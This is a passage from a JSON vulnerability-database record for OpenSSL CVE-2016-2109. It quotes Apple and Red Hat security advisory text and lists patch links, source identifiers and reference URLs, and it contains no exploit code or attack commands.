Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a denial of service\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. These issues were resolved by backporting the fixes from OpenSSL 1.0.2h/1.0.1 to OpenSSL 0.9.8. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A user\u0027s password may be visible on screen\nDescription: An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local application may be able to access the process list\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. Description:\n\nThis release of Red Hat JBoss Core Services httpd 2.4.23 serves as a\nreplacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176,\nCVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196,\nCVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799,\nCVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109,\nCVE-2016-2177, CVE-2016-2178, CVE-2016-2842)\n\n* This update fixes several flaws in libxml2. (CVE-2016-1762,\nCVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,\nCVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,\nCVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)\n\n* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,\nCVE-2016-7141)\n\n* This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)\n\n* This update fixes two flaws in mod_cluster. (CVE-2016-4459,\nCVE-2016-8612)\n\n* A buffer overflow flaw when concatenating virtual host names and URIs was\nfixed in mod_jk. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. \n\nSee the corresponding CVE pages linked to in the References section for\nmore information about each of the flaws listed in this advisory. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6", "sources": [ { "db": "NVD", "id": "CVE-2016-2109" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "BID", "id": "87940" }, { "db": "VULMON", "id": "CVE-2016-2109" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "136919" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "139379" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "140182" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2109", "trust": 3.8 }, { "db": "BID", "id": "87940", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "136912", "trust": 1.8 }, { "db": "BID", "id": "91787", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10160", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-18", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40202", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "SECTRACK", "id": "1035721", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU93163809", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU94844193", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-002476", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2148", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201605-083", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2109", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136919", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136893", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139379", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143513", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140182", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2109" }, { "db": "BID", "id": "87940" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "136919" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136912" }, { "db": "PACKETSTORM", "id": "136958" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "139379" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "CNNVD", "id": "CNNVD-201605-083" }, { "db": "NVD", "id": "CVE-2016-2109" } ] }, "id": "VAR-201605-0079", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.43052093714285716 }, "last_update_date": "2024-07-23T20:50:53.695000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206903" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206903" }, { "title": "HPSBMU03691", "trust": 0.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "title": "SB10160", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "title": "NV16-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv16-015.html" }, { "title": "Major changes between OpenSSL 1.0.1s and OpenSSL 1.0.1t [3 May 2016]", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Major changes between OpenSSL 1.0.2g and OpenSSL 1.0.2h [3 May 2016]", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Harden ASN.1 BIO handling of large amounts of data.", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=c62981390d6cf9e3d612c489b8b77c2913b25807" }, { "title": "ASN.1 BIO excessive memory allocation (CVE-2016-2109)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Linux Bulletin - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" }, { "title": "Oracle Linux Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "title": "RHSA-2016:0722", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "title": "RHSA-2016:0996", "trust": 0.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "title": "SA40202", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "TLSA-2016-14", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-14j.html" }, { "title": "HS16-023", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-023/index.html" }, { "title": "OpenSSL ASN.1 BIO Fixes to implement a denial of service vulnerability", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=61408" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/03/openssl_patches/" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162073 - security advisory" }, { "title": "Red Hat: CVE-2016-2109", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2109" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2959-1" }, { "title": "Debian Security Advisories: DSA-3566-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=055972eb84483959232c972f757685e0" }, { "title": "Amazon Linux AMI: ALAS-2016-695", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-695" }, { "title": "Tenable Security Advisories: [R5] OpenSSL \u002720160503\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-10" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP 2.4.23 Release", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162957 - security advisory" }, { "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49" }, { "title": "Tenable Security Advisories: [R3] PVS 5.1.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-13" }, { "title": "Symantec Security Advisories: SA123 : OpenSSL Vulnerabilities 3-May-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=5d65f6765e60e5fe9e6998a5bde1aadc" }, { "title": "Forcepoint Security Advisories: CVE-2016-2105, 2106, 2107, 2108, 2109, 2176 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=01fd01e3d154696ffabfde89f4142310" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Android Security Bulletins: Android Security Bulletin\u2014July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=8c840629bfabaea20b649ca3c4988587" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=0bd8c924b56aac98dda0f5b45f425f38" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Tenable Security Advisories: [R7] LCE 4.8.1 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-18" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2109 " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2109" }, { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "CNNVD", "id": "CNNVD-201605-083" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002476" }, { "db": "NVD", "id": "CVE-2016-2109" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "trust": 2.0, "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "trust": 1.7, "url": "https://support.apple.com/ht206903" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05320149" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/87940" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00016.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00014.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00018.html" }, { "trust": 1.7, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:17.openssl.asc" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00010.html" }, { "trust": 1.7, "url": "http://www.ubuntu.com/usn/usn-2959-1" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00036.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-2073.html" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20160504-0001/" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us" }, { "trust": 1.7, "url": "https://source.android.com/security/bulletin/2017-07-01" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-18" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa123" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00029.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00008.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00011.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00030.html" }, { "trust": 1.7, "url": "http://www.debian.org/security/2016/dsa-3566" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035721" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00055.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00019.html" }, { "trust": 1.7, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00013.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00001.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=c62981390d6cf9e3d612c489b8b77c2913b25807" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 1.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2109" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu93163809/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu94844193/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2109" }, { "trust": 0.8, "url": "http://www.aratana.jp/security/detail.php?id=16" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=c62981390d6cf9e3d612c489b8b77c2913b25807" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1330101" }, { "trust": 0.3, "url": "https://git.openssl.org/?p=openssl.git;a=commitdiff;h=c62981390d6cf9e3d612c489b8b77c2913b25807" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2016/may/25" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024078" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024319" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021361" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/56?aspxautodetectcookiesupport=1" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987903" }, { "trust": 0.3, "url": "https://support.asperasoft.com/hc/en-us/articles/229505687-security-bulletin-multiple-openssl-vulnerabilities-affect-ibm-aspera-shares-1-9-2-or-earlier-%20-ibm-aspera-console-3-0-6-or-earlier" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988007" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983158" }, { "trust": 0.3, "url": 